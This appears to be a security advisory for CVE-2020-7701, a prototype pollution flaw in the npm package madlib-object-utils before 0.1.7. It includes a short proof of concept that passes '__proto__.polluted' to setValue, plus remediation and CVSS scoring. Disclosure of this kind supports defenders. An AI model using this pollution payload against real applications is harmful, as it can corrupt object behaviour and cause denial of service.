Prototype Pollution

Affecting madlib-object-utils package, versions <0.1.7

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

madlib-object-utils is an A small set of utility functions for working with objects

Affected versions of this package are vulnerable to Prototype Pollution via setValue.

POC:

const objectUtils = require("madlib-object-utils");
objectUtils.setValue('__proto__.polluted', {}, true);
console.log(polluted);

Remediation

Upgrade madlib-object-utils to version 0.1.7 or higher.

CVSS Score

7.5
high severity
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    None
  • Integrity
    None
  • Availability
    High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C
Credit
NerdJS
CVE
CVE-2020-7701
CWE
CWE-400
Snyk ID
SNYK-JS-MADLIBOBJECTUTILS-598676
Disclosed
14 Aug, 2020
Published
14 Aug, 2020